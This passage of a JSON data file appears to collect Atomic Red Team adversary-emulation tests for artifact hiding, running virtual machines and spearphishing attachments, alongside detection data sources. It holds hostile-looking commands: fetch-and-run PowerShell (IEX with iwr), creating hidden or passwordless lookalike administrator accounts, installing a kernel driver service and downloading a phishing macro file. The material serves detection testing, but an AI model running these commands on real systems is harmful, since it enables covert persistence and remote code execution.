\"#{vm_name}\" --register\n\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxManage.exe\" modifyvm \"#{vm_name}\" --firmware efi\n\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxManage.exe\" startvm \"#{vm_name}\"\n", + "source": "atomics/T1564.006/T1564.006.yaml", + "name": "Atomic Red Team Test - Run Virtual Instance" + }, + { + "command": "$VM = \"Atomic VM\"\nNew-VM -Name $VM -Generation 2\nSet-VMFirmware $VM -EnableSecureBoot Off\nStart-VM $VM", + "source": "atomics/T1564.006/T1564.006.yaml", + "name": "Atomic Red Team Test - Run Virtual Instance" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1564.006", + "display_name": "Run Virtual Instance", + "atomic_tests": [ + { + "name": "Register Portable Virtualbox", + "auto_generated_guid": "c59f246a-34f8-4e4d-9276-c295ef9ba0dd", + "description": "ransomware payloads via virtual machines (VM). \n[Maze ransomware](https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "msi_file_path": { + "description": "Path to the MSI file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1564.006\\bin\\Virtualbox_52.msi" + }, + "cab_file_path": { + "description": "Path to the CAB file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1564.006\\bin\\common.cab" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "MSI file must exist on disk at specified location (#{msi_file_path})\n", + "prereq_command": "if (Test-Path #{msi_file_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{msi_file_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/Virtualbox_52.msi\" -OutFile \"#{msi_file_path}\"\n" + }, + { + "description": "CAB file must exist on disk at specified location (#{cab_file_path})\n", + "prereq_command": "if (Test-Path #{cab_file_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{cab_file_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/common.cab\" -OutFile \"#{cab_file_path}\" \n" + }, + { + "description": "Old version of Virtualbox must be installed\n", + "prereq_command": "if (Test-Path \"C:\\Program Files\\Oracle\\VirtualBox\\VboxC.dll\") {exit 0} else {exit 1}\n", + "get_prereq_command": "msiexec /i #{msi_file_path} /qn\n" + } + ], + "executor": { + "command": "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxSVC.exe\" /reregserver\nregsvr32 /S \"C:\\Program Files\\Oracle\\VirtualBox\\VboxC.dll\"\nrundll32 \"C:\\Program Files\\Oracle\\VirtualBox\\VBoxRT.dll,RTR3Init\"\nsc create VBoxDRV binpath= \"C:\\Program Files\\Oracle\\VirtualBox\\drivers\\VboxDrv.sys\" type= kernel start= auto error= normal displayname= PortableVBoxDRV\nsc start VBoxDRV\n", + "cleanup_command": "sc stop VBoxDRV\nsc delete VBoxDRV\nregsvr32 /u /S \"C:\\Program Files\\Oracle\\VirtualBox\\VboxC.dll\"\nmsiexec /x #{msi_file_path} /qn\n", + "name": "command_prompt" + } + }, + { + "name": "Create and start VirtualBox virtual machine", + "auto_generated_guid": "88b81702-a1c0-49a9-95b2-2dd53d755767", + "description": "Create a simple VirtualBox VM and start up the machine\nCleanup command stops and deletes the newly created VM and associated files\nhttps://www.virtualbox.org/manual/ch08.html#vboxmanage-startvm\nhttps://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/\nhttps://attack.mitre.org/techniques/T1564/006/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "vm_name": { + "description": "Name of the new virtual machine", + "type": "String", + "default": "Atomic VM" + }, + "virtualbox_exe": { + "description": "Path to the VirtualBox executable", + "type": "Path", + "default": "C:\\Program Files\\Oracle\\VirtualBox\\VirtualBox.exe" + }, + "vboxmanage_exe": { + "description": "Path to the executable for VBoxManage, the command-line interface to VirtualBox", + "type": "Path", + "default": "C:\\Program Files\\Oracle\\VirtualBox\\VBoxManage.exe" + }, + "virtualbox_download": { + "description": "URL for the current installer for the Windows version of VirtualBox, as of March 2022", + "type": "Url", + "default": "https://download.virtualbox.org/virtualbox/6.1.32/VirtualBox-6.1.32-149290-Win.exe" + }, + "virtualbox_installer": { + "description": "Executable for the Virtualbox installer", + "type": "String", + "default": "VirtualBox-6.1.32-149290-Win.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "VirtualBox must exist on disk at specified locations (#{virtualbox_exe})\n", + "prereq_command": "if (Test-Path \"#{virtualbox_exe}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "$wc = New-Object System.Net.WebClient\n$wc.DownloadFile(\"#{virtualbox_download}\",\"$env:TEMP\\#{virtualbox_installer}\")\nstart-process -FilePath \"$env:TEMP\\#{virtualbox_installer}\" -ArgumentList \"--silent\" -Wait\n" + }, + { + "description": "VBoxManage must exist on disk at specified locations (#{vboxmanage_exe})\n", + "prereq_command": "if (Test-Path \"#{vboxmanage_exe}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "$wc = New-Object System.Net.WebClient\n$wc.DownloadFile(\"#{virtualbox_download}\",\"$env:TEMP\\#{virtualbox_installer}\")\nstart-process -FilePath \"$env:TEMP\\#{virtualbox_installer}\" -ArgumentList \"--silent\" -Wait\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "\"#{vboxmanage_exe}\" createvm --name \"#{vm_name}\" --register\n\"#{vboxmanage_exe}\" modifyvm \"#{vm_name}\" --firmware efi\n\"#{vboxmanage_exe}\" startvm \"#{vm_name}\"\n", + "cleanup_command": "\"#{vboxmanage_exe}\" controlvm \"#{vm_name}\" poweroff\n\"#{vboxmanage_exe}\" unregistervm \"#{vm_name}\" --delete" + } + }, + { + "name": "Create and start Hyper-V virtual machine", + "auto_generated_guid": "fb8d4d7e-f5a4-481c-8867-febf13f8b6d3", + "description": "Create a simple Hyper-V VM (Windows native hypervisor) and start up the machine\nCleanup command stops and deletes the newly created VM\nhttps://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v\nhttps://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/\nhttps://attack.mitre.org/techniques/T1564/006/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "vm_name": { + "description": "Name of the new virtual machine", + "type": "String", + "default": "Atomic VM" + } + }, + "dependencies": [ + { + "description": "Hyper-V must be enabled on the system\nChecks whether Hyper-V is enabled. If not, enables Hyper-V and forces a required restart\n", + "prereq_command": "if ((Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V).State = \"Enabled\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All -Force\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": true, + "command": "$VM = \"#{vm_name}\"\nNew-VM -Name $VM -Generation 2\nSet-VMFirmware $VM -EnableSecureBoot Off\nStart-VM $VM", + "cleanup_command": "Stop-VM $VM -Force\nRemove-VM $VM -Force" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1564", + "command_list": [ + "$macro = [System.IO.File]::ReadAllText(\"PathToAtomicsFolder\\T1564\\src\\T1564-macrocode.txt\")\n$macro = $macro -replace \"aREPLACEMEa\", \"PathToAtomicsFolder\\T1564\\bin\\extractme.bin\"\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroCode \"$macro\" -officeProduct \"Word\" -sub \"Extract\" -NoWrap\n", + "net user $ ATOMIC123! /add /active:yes", + "New-LocalUser -Name \"Administrator \" -NoPassword" + ], + "commands": [ + { + "command": "$macro = [System.IO.File]::ReadAllText(\"PathToAtomicsFolder\\T1564\\src\\T1564-macrocode.txt\")\n$macro = $macro -replace \"aREPLACEMEa\", \"PathToAtomicsFolder\\T1564\\bin\\extractme.bin\"\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroCode \"$macro\" -officeProduct \"Word\" -sub \"Extract\" -NoWrap\n", + "source": "atomics/T1564/T1564.yaml", + "name": "Atomic Red Team Test - Hide Artifacts" + }, + { + "command": "net user $ ATOMIC123! /add /active:yes", + "source": "atomics/T1564/T1564.yaml", + "name": "Atomic Red Team Test - Hide Artifacts" + }, + { + "command": "New-LocalUser -Name \"Administrator \" -NoPassword", + "source": "atomics/T1564/T1564.yaml", + "name": "Atomic Red Team Test - Hide Artifacts" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1564", + "display_name": "Hide Artifacts", + "atomic_tests": [ + { + "name": "Extract binary files via VBA", + "auto_generated_guid": "6afe288a-8a8b-4d33-a629-8d03ba9dad3a", + "description": "This module extracts a binary (calc.exe) from inside of another binary. \n\nIn the wild maldoc authors will use this technique to hide binaries inside of files stored \nwithin the office document itself. An example of this technique can be seen in sample\n\nf986040c7dd75b012e7dfd876acb33a158abf651033563ab068800f07f508226\n\nThis sample contains a document inside of itself. Document 1 is the actual maldoc itself, document 2\nis the same document without all the malicious code. Document 1 will copy Document 2 to the file system\nand then \"peek\" inside of this document and pull out the oleObject.bin file. Contained inside of this\noleObject.bin file is a payload that is parsed out and executed on the file system.\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Microsoft Word must be installed\n", + "prereq_command": "try {\n New-Object -COMObject \"Word.Application\" | Out-Null\n Stop-Process -Name \"winword\"\n exit 0\n} catch { exit 1 }\n", + "get_prereq_command": "Write-Host \"You will need to install Microsoft Word manually to meet this requirement\"\n" + } + ], + "executor": { + "command": "$macro = [System.IO.File]::ReadAllText(\"PathToAtomicsFolder\\T1564\\src\\T1564-macrocode.txt\")\n$macro = $macro -replace \"aREPLACEMEa\", \"PathToAtomicsFolder\\T1564\\bin\\extractme.bin\"\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroCode \"$macro\" -officeProduct \"Word\" -sub \"Extract\" -NoWrap\n", + "cleanup_command": "Remove-Item \"$env:TEMP\\extracted.exe\" -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Create a Hidden User Called \"$\"", + "auto_generated_guid": "2ec63cc2-4975-41a6-bf09-dffdfb610778", + "description": "Creating a user with a username containing \"$\"", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "command_prompt", + "elevation_required": true, + "command": "net user $ ATOMIC123! /add /active:yes", + "cleanup_command": "net user $ /DELETE 2>&1" + } + }, + { + "name": "Create an \"Administrator \" user (with a space on the end)", + "auto_generated_guid": "5bb20389-39a5-4e99-9264-aeb92a55a85c", + "description": "Creating a user with a username containing with a space on the end", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": true, + "command": "New-LocalUser -Name \"Administrator \" -NoPassword", + "cleanup_command": "Remove-LocalUser -Name \"Administrator \" 2>&1 | out-null" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account creation", + "description": "A user account was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account metadata", + "description": "Data and information that describe a user account and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "user" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + null, + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ] + ] + }, + { + "technique_id": "T1566.001", + "command_list": [ + "$url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest -Uri $url -OutFile $env:TEMP\\PhishingAttachment.xlsm\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\n$macrocode = \" Open `\"C:\\Users\\Public\\art.jse`\" For Output As #1`n Write #1, `\"WScript.Quit`\"`n Close #1`n Shell`$ `\"ping 8.8.8.8`\"`n\"\nInvoke-MalDoc -macroCode $macrocode -officeProduct \"#{ms_product}\"\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\n$macrocode = \" Open `\"#{jse_path}`\" For Output As #1`n Write #1, `\"WScript.Quit`\"`n Close #1`n Shell`$ `\"ping 8.8.8.8`\"`n\"\nInvoke-MalDoc -macroCode $macrocode -officeProduct \"Word\"\n" + ], + "commands": [ + { + "command": "$url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest -Uri $url -OutFile $env:TEMP\\PhishingAttachment.xlsm\n", + "source": "atomics/T1566.001/T1566.001.yaml", + "name": "Atomic Red Team Test - Phishing: Spearphishing Attachment" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\n$macrocode = \" Open `\"C:\\Users\\Public\\art.jse`\" For Output As #1`n Write #1, `\"WScript.Quit`\"`n Close #1`n Shell`$ `\"ping 8.8.8.8`\"`n\"\nInvoke-MalDoc -macroCode $macrocode -officeProduct \"#{ms_product}\"\n", + "source": "atomics/T1566.001/T1566.001.yaml", + "name": "Atomic Red Team Test - Phishing: Spearphishing Attachment" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr 